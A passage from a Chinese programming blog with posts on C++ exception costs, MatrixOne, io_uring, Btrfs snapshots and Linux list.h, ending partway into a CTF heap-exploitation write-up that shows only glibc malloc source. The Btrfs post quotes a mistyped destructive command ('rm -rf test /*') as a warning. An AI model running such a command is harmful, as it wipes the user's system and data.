0x00000000004019d7 <+66>:    call   0x402e30 <__cxa_throw>
0x00000000004019dc <+71>:    nop
0x00000000004019dd <+72>:    mov    rbx,QWORD PTR [rbp-0x8]
0x00000000004019e1 <+76>:    leave  
0x00000000004019e2 <+77>:    ret

可以看到汇编中使用 __cxa_throw 将异常抛出，call __cxa_throw 执行结束并不返回到后面的一条汇编，而是跳转到对应的 catch 语句（后文会提及）或 terminate（如果异常不被 catch）。

这是在抛出异常时的部分调用栈（箭头由 调用者 指向 被调用者）：

__cxa_throw -> _Unwind_RaiseException -> uw_init_context_1 -> uw_frame_state_for -> _Unwind_Find_FDE -> search_object -> classify_object_over_fdes

__cxa_throw -> _Unwind_RaiseException -> uw_init_context_1 -> uw_frame_state_for -> execute_cfa_program

对这段代码涉及的代码不算太长但也不短，感兴趣的读者可以去 gcc 的源码里面自行查找，Y7n05h 在这里就不放了。

看到这些函数，就不会问出：「一次异常和一次 if-else 的性能比较」的问题了。

注：和一次 if-else 相比，异常机制必然有更多的开销。因为抛出异常的机制的代码数量和单次 if-else 相比是多个数量级的差异，根本没有比较的意义。但用这样的对比来说明「错误码」和「异常」这两种错误处理的机制的性能是荒谬的（详见下文）。

因此，异常机制对代码的 bad path 是通常是劣化。

刚刚看完了 throw 的实现，再看看 catch：

0x00000000004019e3 <+0>:     push   rbp
0x00000000004019e4 <+1>:     mov    rbp,rsp
0x00000000004019e7 <+4>:     push   rbx
0x00000000004019e8 <+5>:     sub    rsp,0x18
0x00000000004019ec <+9>:     mov    DWORD PTR [rbp-0x14],edi
0x00000000004019ef <+12>:    mov    eax,DWORD PTR [rbp-0x14]
0x00000000004019f2 <+15>:    mov    edi,eax
0x00000000004019f4 <+17>:    call   0x401995 <bar(unsigned int)>
0x00000000004019f9 <+22>:    lea    rax,[rip+0x98604]        # 0x49a004
0x0000000000401a00 <+29>:    mov    rdi,rax
0x0000000000401a03 <+32>:    call   0x421a00 <puts>
0x0000000000401a08 <+37>:    jmp    0x401a3b <foo(int)+88>
0x0000000000401a0a <+39>:    mov    rdi,rax
0x0000000000401a0d <+42>:    call   0x401f30 <__cxa_begin_catch>
0x0000000000401a12 <+47>:    lea    rax,[rip+0x985ef]        # 0x49a008
0x0000000000401a19 <+54>:    mov    rdi,rax
0x0000000000401a1c <+57>:    call   0x421a00 <puts>
0x0000000000401a21 <+62>:    call   0x401fa0 <__cxa_end_catch>
0x0000000000401a26 <+67>:    jmp    0x4019f9 <foo(int)+22>
0x0000000000401a28 <+69>:    mov    rbx,rax
0x0000000000401a2b <+72>:    call   0x401fa0 <__cxa_end_catch>
0x0000000000401a30 <+77>:    mov    rax,rbx
0x0000000000401a33 <+80>:    mov    rdi,rax
0x0000000000401a36 <+83>:    call   0x4102f0 <_Unwind_Resume>
0x0000000000401a3b <+88>:    mov    rbx,QWORD PTR [rbp-0x8]
0x0000000000401a3f <+92>:    leave
0x0000000000401a40 <+93>:    ret

若 bar 不抛出异常，0x00000000004019f4 <+17>: call 0x401995 <bar(unsigned int)> 执行完成后会正常返回至 0x00000000004019f9 <+22>: lea rax,[rip+0x98604] # 0x49a004；若 bar 抛出异常，执行完这次 0x00000000004019f4 <+17>: call 0x401995 <bar(unsigned int)> 后会回到 0x0000000000401a0a <+39>: mov rdi,rax。
可以看到这个 try { ... } 其实并没有开销，开销在 catch 上。
与使用错误码相比，使用异常的方案在 happy path（不抛出异常的情况）上，消除了一次条件跳转（或多次条件跳转，如果结果需要在多层函数调用间逐层返回的话），众所周知，条件跳转是有可能带来 分支预测惩罚 的。因此，异常机制对代码的 happy path 是优化。

再看看 __cxa_begin_catch 和 __cxa_end_catch 的部分调用栈（箭头由 调用者 指向 被调用者）：

__cxa_begin_catch -> __cxa_get_globals

__cxa_end_catch -> __cxa_get_globals_fast
__cxa_end_catch -> _Unwind_DeleteException

这些调用栈都很浅。对整个 throw、catch 的机制来说，复杂度在 throw 上，catch 只做了很少的工作，这一点从调用栈的长度也能看出一点端倪。

是否该使用异常？

上文的讨论中，已经说明了异常机制在代码的 happy path 比错误码具有更多的优势，在 bad path 与错误码相比则具有劣势。
在较深的调用栈中逐层返回错误码可能需要使用多次 if-else 完成多次条件跳转，这也带来了多次潜在的 分支预测惩罚 。此时使用异常所需的成本可能相对较低。

高效使用异常必然该是 扬长避短 的，只讨论 happy path 上 exception 的优势，或是只讨论 bad path 上 exception 的劣势都是片面的。
讨论异常的使用必然需要综合这两方面的影响。
因此，在绝大多数情况都在 happy path 时，happy path 带来的优化比 bad path 带来的劣化多，使用异常才比使用错误码有优势。

回到最开始的 leetcode 题目上去，异常在查找 LRU 缓存中不存在的 key 时被抛出，显然不是（至少在这个测试的情景中显然不是）极少数情况。Y7n05h 在这里的对异常的用法，将异常作为了一种常见情况的控制流，已经背离了扬长避短的做法，性能差也就不奇怪了。

更详细、严谨的说明异常和一些别的处理错误的方式的比较，以及何时该使用异常请看参考资料 1 和参考资料 2。

异常的原理

对于 Y7n05h 而言，至此已经解决所遇到的问题了：异常有多慢，异常的正确使用场景是什么也都有了答案。
这一段只是为了浅浅的看看为什么 throw 会那么慢，这也就需要看看 __cxa_throw 究竟是怎么实现的。

如需详细、具体的了解 C++ 异常的实现原理请看参考资料 3，那是非常棒的资料。

—

在抛出异常时，程序需要在 ELF 的 .eh_frame section 的信息的指导下完成对栈的两次遍历（一次用来查找 catch 一次用来逐层的对栈上的元素执行析构）。

.eh_frame section 占据的空间一点也不小。
对上面用作示例的 SimpleException.cpp 程序 .eh_frame section 占据了 0x108 bytes，而 .text section 也才占据了 0x1ef bytes。

参考资料

¹：Bjarne Stroustrup. C++ exceptions and alternatives[G/OL]. http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2019/p1947r0.pdf.
²：Herb Sutter. Zero-overhead deterministic exceptions: Throwing values[G/OL]. http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2019/p0709r4.pdf.
³：Nico Brailovsky. C++ exceptions under the hood[G/OL]. https://monkeywritescode.blogspot.com/p/c-exceptions-under-hood.html.
⁴：江召伟. c++ 异常处理[G/OL]. https://www.cnblogs.com/jiangzhaowei/p/4989197.html.

2022-03-14发表7 分钟读完 (大约1110个字)

MatrixOne 开发感悟

初识

这里也还没听说过 MatrixOne 的读者介绍一下：

MatrixOne is a future-oriented hyper-converged cloud and edge native DBMS that supports transactional, analytical, and streaming workloads with a simplified and distributed database engine, across multiple data centers, clouds, edges and other heterogeneous infrastructures.[1]

以 Y7n05h 的个人感受，这是一个正在蓬勃发展的社区。仅仅是最近几天 Github 的主分支上就已经有了很多的提交。

恰逢 Y7n05h 对数据库系统的设计还是非常感兴趣的，Y7n05h 还是像去参与进去看看能不能完成一些社区所需要的功能。

参与

当然，要参与社区贡献，那也不是随随便便就参与的。首先，Y7n05h 看了下 CoC，仔细的看了下里面的条款，Y7n05h 认为里面的内容和自己的价值观是基本基本一致的，也是一个很包容新的参与者的社区。又看了一项目的下 License，发现是 Apache-2.0 这也是 FSF 和 OSI 共同批准的自由软件/自由软件许可证。

看完这些 Y7n05h 对 MatrixOne 社区也没有别的顾虑了，放心的在 issues 里面找了个带有 good first issue 标签的简单的 issues 去完成。

[Feature Request]: Mathematical Built-in function exp()

这就是 Y7n05h 决定去完成的 issue 了。
这个 issues 就是去实现 exp() 这个函数，也就是数学中的 $e^x$ 。issues 中给出了一个十分详细的文档用来指导贡献者如何为 MatrixOne 添加一个新的内置函数。

说回 exp() ，这是一个常见的数学函数，为了便于说明，Y7n05h 还是放出他的图像。

相信中学的知识足够得出它的定义域是 $R$ 值域是 $(0,+\infty)$ 。

感觉这函数的数学特性，需要作出一些合理的设计。首先要想的是这个函数的返回值该是什么类型。
Y7n05h 想过，是否该接受一个整数类型的输入并返回一个小数部分被阶段的整数类型的结果。但这是不合理的。因为 $e^{45}$ 即使存储在 Uint64 里面也会发生整数溢出。也就意味着，倘若返回一个整数，若以任何大于等于 45 的整数作为参数进行调用 exp() 都会得到一个溢出后的数据。这显然是不可接受的。
那么，如何解决这种困境呢？通过将返回类型更改为浮点数这样不但在输入较小时不受指数函数的爆炸式增长的影响，且在输入数据较大时能够以精度的损失为代价保存下结果的近似值。

因此，不难想到，接受任意的整数或浮点数类型，并输出一个 float64 是一个最合适的选择。

下面的困难就是如何完成这个内置函数了。关于实现这个函数，根据文档，只需要完成：

注册函数的类型
实现函数
这两个步骤既可。

写完这些之后，也还需要对函数的实现部分撰写单元测试。

上述内容实际上也就设计 4 个文件的更改。

在刚开始的时候，虽然有十分详细的文档，但 Y7n05h 也不能很好的理解整个函数实现方法，加之对这个项目是第一次接触，不能正确的理解项目的复杂结构（虽说 Y7n05h 只要看懂部分的结构就够了，但那是 Y7n05h 连部分结构也都没看明白）。
但这也并非无解。项目的源码里面，log()、ln()、abs() 这些函数的实现方式与 exp() 其实是十分类似的，已有的实现其实是文档未尽之处的最好补充。因此，Y7n05h 通过参考这些函数的实现最终完成了这个 issues。

参考资料

¹. matrixone.[G/OL].https://github.com/matrixorigin/matrixone/blob/main/README.md. ↩

2022-01-04发表Dev17 分钟读完 (大约2600个字)

真正的异步--io_uring 闲谈

历史的接口

IO 一直是件麻烦事．对冯诺依曼模型的计算机来说，IO 可以说是计算的开始和结束．因此 IO 十分麻烦，但异常重要．
高效的 IO 方式，是构建高效的应用程序必不可少的，更是计算机科学家与工程师们一直探讨的话题．

在本文中，笔者将简要的回顾 Linux Kernel 已有的 IO 接口．

注：本文不涉及 io_uring 的用法．如需了解 io_uring 的用法请直接查看本文参考资料．

同步接口

常见的 read、write 等 syscall 都是同步 IO 的接口．
read、write 类系统调用也衍生出了带有偏移量的接口 pread、pwrite 向量读写的接口 readv、writev 和具有两者特性的 preadv、pwritev，后来又出现为 preadv、pwritev 加上 flag 字段的 preadv2、pwritev2 接口．

说了这些，但究竟什么是同步？

同步接口最鲜明的特征就是应用程序：要么在执行应用程序中的用户代码；要么在因完成 IO．
听起来可能有人觉得模糊，请看下面这张图．同步就是「IO 的完成」是在「请求执行 IO 的时候」（~~Y7n05h 嘴笨实在不知道该怎么组织语言解释了~~）

在图中：

紫色代表应用程序在执行用户代码
红色代表应用程序在完成 IO

我们可以看到，紫色块和红色块在时间上没有任何的重叠区域．完成 IO 不会和用户代码同时进行．

Y7n05h 猜测一定有读者想说，为什么都说了这么多了，没有提及 阻塞 和 非阻塞 哪怕一句．

这里请允许 Y7n05h 先说异步 IO．因为很多人把 非阻塞 和 异步 混为一谈．Y7n05h 认为先说明异步 IO 有助于理解这二者的概念．

异步接口

同步的反面是异步．

异步就是应用程序只需要提交一次 IO 的请求，由别的组件（通常是内核）来完成完成这次 IO，并在 IO 完成时告诉应用程序 IO 已经完成．

注：有经验的读者一定发现 Y7n05h 在此处刻意模糊了内核在 IO 中的作用，也未提及系统调用导致的陷入内核态等行为．这是为了使本文对异步的描述也适用于 ASIO 等用户态对异步 IO 的实现．

如下图：应用程序无需间断对代码的执行，只需要提交一次请求，即可静待别人（通常是内核）完成 IO．

对于异步 IO ：这就好比一个聪明的老板（类比应用程序）请了一个高明的助理，收发文书（类比 IO 行为）之类的事情，只需要老板吩咐一声，助理就好办妥当．助理办妥当后，告诉老板这件事办好了即可．老板只需要接着做自己的事（类比执行代码）．

对于同步 IO ：这就好比一个没有助理的老板（类比应用程序），收发文书（类比 IO 行为）之类的事情也得自己干．忙着收发文书就不能做自己的事情（类比执行代码）了．

阻塞与非阻塞

谈阻塞和非阻塞就一定谈谈内核了．
在 Linux 系统中，无论采用阻塞 IO 还是非阻塞 IO，若 IO 已经准备好了，那么会立刻返回．
阻塞和非阻塞的区别仅限于 IO 尚未准备就绪的情况下（例如写管道缓冲区已满、读 socket 但尚无数据到达）．这类场景，在在使用非阻塞 IO 的系统调用时，系统调用会立刻返回，并通过返回值和 errno 告诉调用者出现了错误．但若是使用阻塞 IO 的系统调用，则会继续等待制止 IO 完成．

Q：那么阻塞与否和同步、异步又有什么关系？
A：平日说的阻塞与非阻塞大多数情景是指同步阻塞和同步非阻塞．对于异步 IO 是否阻塞的问题，通常不做探讨．

为什么？那就要接着回顾 IO 接口的发展了．

众所周知，无论是网络 IO 还是硬盘 IO，其速度远低于 CPU 的运行速度．因此，等待 IO 浪费了应用程序原本可以执行很多事务的时间．追求高性能的应用程序自然不肯什么都不做静静的等待 IO 的发生．
在 Y7n05h 看来 同步非阻塞 的 IO 调用就是为了解决应用程序长时间等待 IO 浪费时间的问题．使用阻塞 IO 之后，应用程序自然可以过每过一小段时间尝试一次 IO 是否已经就绪，别的时间继续用来做别的事，这也就是是所谓的轮询．
倘若一个 IO 密集型应用（例如一个服务器）那么可能需要同时处理大量的 IO 请求，当然遍历并轮询所有的 IO 是否就绪是一个做法．内核也提供了相关的设施用来完成遍历并轮询的操作（select、poll），但这在同步 IO 中也不是一个最好的做法．内核还提供了 epoll 这种机制，当内核通过中断机制得知有 IO 时间发生时通知应用程序．这样便避免了遍历之苦也提高了 IO 的效率．这也就是 IO 的多路复用了．

非阻塞 IO 的语义是：试一试，若能完成 IO 就完成；完不成就算了．

说了这么多，我想读者一定发现了：非阻塞 IO 无非是想提高 CPU 的利用率．

谈回异步，既然异步 IO 已经不可能卡住应用程序的代码了．那么阻塞与否就已经没了意义．
不但非阻塞在异步 IO 中没有意义，反而会制造麻烦．何处此言？因为非阻塞 IO 遇到 IO 未就绪时会直接返回．

回到之前老板请助理的例子．老板一定不会希望他请助理去送一份文件，仅仅是因为助理没找到收件人就回来向他报告失败，而是希望他去等收件人回来再把文件交给他．这才是一个聪明的助理．异步 IO 完美的符合了这一切的标准．

io_uring 一统天下

在 io_uring 出现之前，追求高性能 IO 的应用程序有这几种常见做法：

针对文件 IO 可采用 AIO 异步接口．
epoll + 同步非阻塞．
使用类似 boost Asio 的方式，使用 IO 线程模拟异步接口．

但这几种方式都有自己的问题：

AIO 仅支持文件 Direct IO．
epoll + 同步非阻塞在大量连接的高并发场景中比 io_uring 有更高的开销和更高的延迟．
boost Asio 与 io_uring 同为异步接口，但 io_uring 的在内核态的实现比在用户态基于多线程模拟异步 IO 更高效．
可以说，AIO 被 io_uring 最主要是因为 AIO 的应用面太窄．而「epoll 同步非阻塞」和「boost Asio」被 io_uring 打败是因为 io_uring 的性能更好．

但 io_uring 并非没有缺点．

可移植性差．
这是 io_uring 的一个硬伤．io_uring 是 Linux 5.1 中加入的新接口．且 io_uring 还有部分特性在 5.6 才最终加入．因此想体验 io_uring 的一个相对完整的特性可能需要 Linux Kernel 5.6+．（虽然 Linux Kernel 5.6 中的 io_uring 已经相对完整了，但 Linux Kernel 5.10-5.15 中也为 io_uring 添加了更多的新特性）

接口复杂．
注意到了吗？io_uring 代替的是「epoll + 同步非阻塞」而不仅仅是 epoll．为了支持各种 IO 调用，io_uring 通过庞大 struct io_uring_sqe 描述各种各样的 IO 请求．但 io_uring 接口的复杂性不仅仅体现在这里．io_uring_setup、io_uring_enter、io_uring_register 看似仅仅只有 3 个系统调用，但它们却都分别支持了十多个 flag 来改变系统调用的行为．

那么 io_uring 的性能为什么会好呢？

内核和用户态通过 mmap 共享 io_uring 相关的部分数据结构．
内核可以并行执行应用程序提交的 IO 请求．
节省系统调用次数．将 IO 请求放入提交队列（SQ）即可，无需通过中断陷入内核执行系统调用．

MoreInfo

本文到这里就结束了．读者可能会觉得有点突兀，但 Y7n05h 写本文的意愿本就不是去介绍 io_uring 的用法．本文仅仅是为了科普这几种不同的 IO 的方式的区别，区分「阻塞」与「非阻塞」这一对概念和「同步」与「异步」这一堆概念．对于需要详细了解 io_uring 的读者，请看下面的参考资料．

参考资料

¹. Efficient IO with io_uring.[G/OL].https://kernel.dk/io_uring.pdf. ↩

². What is io_uring?. [G/OL]. Lord of the io_uring, https://unixism.net/loti/what_is_io_uring.html. ↩

³. IO_URING(7). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring.7. ↩

⁴. IO_URING_SETUP(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_setup.2. ↩

⁵. IO_URING_ENTER(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_enter.2. ↩

⁶. IO_URING_REGISTER(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_register.2. ↩

2021-11-29发表8 分钟读完 (大约1143个字)

使用 Btrfs 文件系统快照

和其他的 ArchLinux 的用户一样，Y7n05h 也很热衷于尝试一些有趣且实用的技术．

Btrfs 早就因 Cow、透明压缩和子卷管理让 Y7n05h 感到心动．在此早在本文写作的 1 年之前，Y7n05h 就尝试过了 Btrfs 这一 Linux Kernel 的源码树内 fs.
当时 Y7n05h 只是浅层次的使用 btrfs（btrfs 具有而 xfs 没有的功能 Y7n05h 没用到），到了现在 Y7n05h 也尝试过了 btrfs 的很多特性，并且 Y7n05h 开始认为这些特性对 Y7n05h 很重要．
下面，就请允许 Y7n05h 聊聊对此的认识吧．

子卷管理

既然都说道了子卷的管理，那就先说一下子卷是什么：

A Btrfs subvolume is an independently mountable POSIX filetree and not a block device (and cannot be treated as one). Most other POSIX filesystems have a single mountable root, Btrfs has an independent mountable root for the volume (top level subvolume) and for each subvolume; a Btrfs volume can contain more than a single filetree, it can contain a forest of filetrees. A Btrfs subvolume can be thought of as a POSIX file namespace.[1]

为了简化理解困难，在初始 btrfs 的时候，不妨将子卷理解为多个不同的分区．

子卷的常见布局可以参考：这里．

快照

粗略的说完子卷，那么我们可以谈谈快照了．

Q：为什么要使用快照？
A：快照是为了恢复回滚，这是所有人都知道的事情．但说我为什么需要他的话，就是给自己错误操作后留下更多的补救的余地，避免重装系统．还能为应用程序错误导致系统故障或崩溃提供方便的恢复方式．我想快照的用途是不言自明的．

tip
TIP

或许有人会说，你注意点，别进行错误操作，只要谨慎的使用命令，就用不到快照．

当然，Y7n05h 也不希望有用快照恢复的情景出现．毕竟出现恢复的情景就已经意味着故障的发生了．但错误的出现有时是难以简单的通过谨慎的方式来避免的．在使用 Linux 命令时，谨慎的操作是必要的，但真的当 bad 的情况出现时，快照则是迅速将崩溃的系统拉出泥潭的有力工具．

举个例子：
Y7n05h 曾为了清除某文件夹下面的所有文件，本想使用命令 sudo rm -rf test/* 没主要到多输入了一个空格，成为了 sudo rm -rf test /*，导致错误的执行了删除 /* 的命令．最后只好用重装系统来解决问题．

btrfs 现如今只支持对 btrfs 子卷进行快照，而快照也会以 btrfs 的一个特殊的子卷的方式存在．
至于创建快照与删除快照的方式，可查看 ArchLinuxWiki-Btrfs#Snapshots 或者 Btrfs Wiki 中的相关内容．在本文中不给出具体的命令也是希望看到本文想去尝试 btrfs 的读者认真的阅读 wiki 与相关文档并审慎的做出决定，而不仅仅是受到了 Y7n05h 的鼓动．

自动快照

得益于 Btrfs 上相对廉价的快照开销，频繁的使用快照也并不总是不可接受的．

snapper

Y7n05h 使用来自 openSUSE snapper) 完成自动化的 btrfs 快照．
snapper 会在每小时为 btrfs 子卷进行一次快照，并自动的删除旧的快照．

在默认配置下，snapper 将保留 10 个每小时快照，10 个每日快照，10 个每月快照和 10 个每年快照。[2]

btrfs-autosnapshot

当然，来自 lilydjwg 的 btrfs-autosnapshot 同样是不错的工具．
btrfs-autosnapshot 作为一个 python 脚本，提供了一种更自定义的方式来控制快照的创建和清理．

参考资料

¹. BtrfsWiki编者. SysadminGuide[G/OL]. BtrfsWiki, https://btrfs.wiki.kernel.org/index.php/SysadminGuide#Subvolumes. ↩

². ArchWiki编者. Installation guide (简体中文)[G/OL]. ArchWiki, https://wiki.archlinux.org/index.php/Installation_guide_(简体中文). ↩

³. farseerfc. Btrfs vs ZFS 实现 snapshot 的差异[G/OL]. Farseerfc的小窝, https://farseerfc.me/zhs/btrfs-vs-zfs-difference-in-implementing-snapshots.html. ↩

2021-11-13发表12 分钟读完 (大约1750个字)

LinuxKernel-list.h 源码不完全分析

有一段时间没认真写博客了，没能一直坚持着，实在让 Y7n05h 感到惭愧，所以今天写出本文也算是补救一下吧．

info
License
本文引用了部分来自 Linux Kernel 的源码，源码取自 LinuxKernel v2.6.34 基于 GPLv2．

list.h 源码分析

/*
 * Simple doubly linked list implementation.
 *
 * Some of the internal functions ("__xxx") are useful when
 * manipulating whole lists rather than single entries, as
 * sometimes we already know the next/prev entries and we can
 * generate better code by using them directly rather than
 * using the generic single-entry routines.
 */

struct list_head {
	struct list_head *next, *prev;
};

#define LIST_HEAD_INIT(name) { &(name), &(name) }

#define LIST_HEAD(name) \
	struct list_head name = LIST_HEAD_INIT(name)

static inline void INIT_LIST_HEAD(struct list_head *list)
{
	list->next = list;
	list->prev = list;
}

这里是链表的核心结构，实现双向循环链表的初始化．

static inline void __list_add(struct list_head *new,
			      struct list_head *prev,
			      struct list_head *next)
{
	next->prev = new;
	new->next = next;
	new->prev = prev;
	prev->next = new;
}

/**
 * list_add - add a new entry
 * @new: new entry to be added
 * @head: list head to add it after
 *
 * Insert a new entry after the specified head.
 * This is good for implementing stacks.
 */
static inline void list_add(struct list_head *new, struct list_head *head)
{
	__list_add(new, head, head->next);
}


/**
 * list_add_tail - add a new entry
 * @new: new entry to be added
 * @head: list head to add it before
 *
 * Insert a new entry before the specified head.
 * This is useful for implementing queues.
 */
static inline void list_add_tail(struct list_head *new, struct list_head *head)
{
	__list_add(new, head->prev, head);
}

关于插入也没什么需要过度解释的，唯一想说说的是 inline 的使用消除了函数调用的开销，当然代价是内核大小的增大，但我想这点代价是值得的．
当然，这里对 __list_add() 的复用和对两种不同的插入方式的抽象是十分精彩的．

/*
 * Delete a list entry by making the prev/next entries
 * point to each other.
 *
 * This is only for internal list manipulation where we know
 * the prev/next entries already!
 */
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev;
	prev->next = next;
}

/**
 * list_del - deletes entry from list.
 * @entry: the element to delete from the list.
 * Note: list_empty() on entry does not return true after this, the entry is
 * in an undefined state.
 */
#ifndef CONFIG_DEBUG_LIST
static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
#else
extern void list_del(struct list_head *entry);
#endif

关于这里，也没什么能产生太大疑惑的地方，唯一要好奇的可能是为什么要把被删除的链表节点的指针置为 LIST_POISON1 或 LIST_POISON2？
在用户态编程的时候，开发者们常把无效的指针置为 NULL 防止出现 Use After Free(UAF) 等问题的出现，一旦访问置为 NULL 的指针就能通过 Segment fault 得知发生了错误．但别忘了，Segment fault的检查是由内核完成的，在内核态编程时，自然是无法使用的．因此这里使用这两个特殊的地址触发分页保护告知开发者出现内存错误．

/*
 * Architectures might want to move the poison pointer offset
 * into some well-recognized area such as 0xdead000000000000,
 * that is also not mappable by user-space exploits:
 */
#ifdef CONFIG_ILLEGAL_POINTER_VALUE
# define POISON_POINTER_DELTA _AC(CONFIG_ILLEGAL_POINTER_VALUE, UL)
#else
# define POISON_POINTER_DELTA 0
#endif

/*
 * These are non-NULL pointers that will result in page faults
 * under normal circumstances, used to verify that nobody uses
 * non-initialized list entries.
 */
#define LIST_POISON1  ((void *) 0x00100100 + POISON_POINTER_DELTA)
#define LIST_POISON2  ((void *) 0x00200200 + POISON_POINTER_DELTA)

剩下的部分虽然也有很多内容，但都比较简单，相对来说也是易于理解的，Y7n05h 在这里就不赘述了．

这个宏函数还是很有趣的，能看到里面有很多 GNU 对 C 语言的扩展语法．直接从定义中看明白这个宏的用法是略有困难的，参考这个宏的用例将有助于理解．

/**
 * list_entry - get the struct for this entry
 * @ptr:	the &struct list_head pointer.
 * @type:	the type of the struct this is embedded in.
 * @member:	the name of the list_struct within the struct.
 */
#define list_entry(ptr, type, member) \
	container_of(ptr, type, member)

/**
 * container_of - cast a member of a structure out to the containing structure
 * @ptr:	the pointer to the member.
 * @type:	the type of the container struct this is embedded in.
 * @member:	the name of the member within the struct.
 *
 */
#define container_of(ptr, type, member) ({			\
	const typeof( ((type *)0)->member ) *__mptr = (ptr);	\
	(type *)( (char *)__mptr - offsetof(type,member) );})

用例：

static inline struct nfs_page *
nfs_list_entry(struct list_head *head)
{
	return list_entry(head, struct nfs_page, wb_list);
}

struct nfs_page {
	struct list_head	wb_list;	/* Defines state of page: */
	struct page		*wb_page;	/* page to read in/write out */
	struct nfs_open_context	*wb_context;	/* File state context info */
	atomic_t		wb_complete;	/* i/os we're waiting for */
	pgoff_t			wb_index;	/* Offset >> PAGE_CACHE_SHIFT */
	unsigned int		wb_offset,	/* Offset & ~PAGE_CACHE_MASK */
				wb_pgbase,	/* Start of page data */
				wb_bytes;	/* Length of request */
	struct kref		wb_kref;	/* reference count */
	unsigned long		wb_flags;
	struct nfs_writeverf	wb_verf;	/* Commit cookie */
};

可以清晰的看到在 struct nfs_page 中，链表结点是 struct list_head wb_list．

而 head 是指向 container_of 到底做了什么呢？那就是根据结构体中的成员的地址，计算出结构体的地址．首先，抛开代码考虑这件事情，在给定结构体在确定体系结构上使用确定对齐方式，那么结构体成员相对结构体的偏移量就是一个编译期能确定的常量．那么若有了结构体成员的地址，那么减去相应的偏移量即可得到结构体的地址．这一切在理论上都是可行的，剩下的事只是如何用代码实现．

其次，分析 container_of 的代码实现：

1	const typeof( ((type )0)->member ) __mptr = (ptr);

这里使用 typeof 进行类型推断，实现范型编程，声明获得与 member 相同的类型，并添加 * 获得 member 的指针类型．通过这一行，获得了指向结构体成员的指针．同时利用 (type *)( (char *)__mptr - offsetof(type,member) ) 根据 offsetof 关键字获得 member 在 type 中的偏移量，并使用指针运行将其从结构体成员的地址中减去．
最后则是使用 GNU 扩展的语句表达式语法，避免了需要将宏函数用 do{...}while(0) 包裹的麻烦事．
这些内容足够简单，但宏的运用与衔接十分精妙．

最后在谈谈

/**
 * list_for_each	-	iterate over a list
 * @pos:	the &struct list_head to use as a loop cursor.
 * @head:	the head for your list.
 */
#define list_for_each(pos, head) \
	for (pos = (head)->next; prefetch(pos->next), pos != (head); \
        	pos = pos->next)

1
2
3

#ifndef ARCH_HAS_PREFETCH
#define prefetch(x) __builtin_prefetch(x)
#endif

这里的遍历没什么好提及的，唯一想说说的地方只是 prefetch．prefetch 也就是 __builtin_prefetch 看名字不难发现这是 GCC 的内置函数．查一下就能得知这是用来预读数据减少延迟的函数．大概就是防止后面用这个数据的时候出现缓存不命中吧．

好了，本文到此也就结束了．list.h 的别的部分 Y7n05h 认为也没有什么难以理解的内容了．

参考资料

¹. LinuxKernel. ↩

2021-11-13发表CyberspaceSecurity10 分钟读完 (大约1457个字)

gyctf_2020_signin

info
License
本文引用了部分来自 GNU C Library 的源码，源码取自 GNU C Library 基于 LGPLv2.1．

注：本题目的运行环境使用的 glibc 为 2.27-3ubuntu1_amd64，但本文中展示的所有 glibc 代码为 2.34．

看到本文的各位师傅，请允许 Y7n05h 又翻出这段各位都熟悉无比的代码．能够发现从非空的 tcache 中取出 chunk 是在 __libc_malloc() 中完成的，而非在 _int_malloc_() 中．

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
                  "PTRDIFF_MAX is not more than half of SIZE_MAX");

  if (!__malloc_initialized)
    ptmalloc_init ();
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  if (!checked_request2size (bytes, &tbytes))
    {
      __set_errno (ENOMEM);
      return NULL;
    }
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      && tcache
      && tcache->counts[tc_idx] > 0)
    {
      victim = tcache_get (tc_idx);
      return tag_new_usable (victim);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

  if (SINGLE_THREAD_P)
    {
      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
	      &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

  arena_get (ar_ptr, bytes);

  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before.  */
  if (!victim && ar_ptr != NULL)
    {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  victim = tag_new_usable (victim);

  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
          ar_ptr == arena_for_chunk (mem2chunk (victim)));
  return victim;
}

再看 __libc_calloc()：

void *
__libc_calloc (size_t n, size_t elem_size)
{
  mstate av;
  mchunkptr oldtop;
  INTERNAL_SIZE_T sz, oldtopsize;
  void *mem;
  unsigned long clearsize;
  unsigned long nclears;
  INTERNAL_SIZE_T *d;
  ptrdiff_t bytes;

  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
    {
       __set_errno (ENOMEM);
       return NULL;
    }

  sz = bytes;

  if (!__malloc_initialized)
    ptmalloc_init ();

  MAYBE_INIT_TCACHE ();

  if (SINGLE_THREAD_P)
    av = &main_arena;
  else
    arena_get (av, sz);

  if (av)
    {
      /* Check if we hand out the top chunk, in which case there may be no
	 need to clear. */
#if MORECORE_CLEARS
      oldtop = top (av);
      oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
      /* Only newly allocated memory is guaranteed to be cleared.  */
      if (av == &main_arena &&
	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
      if (av != &main_arena)
	{
	  heap_info *heap = heap_for_ptr (oldtop);
	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
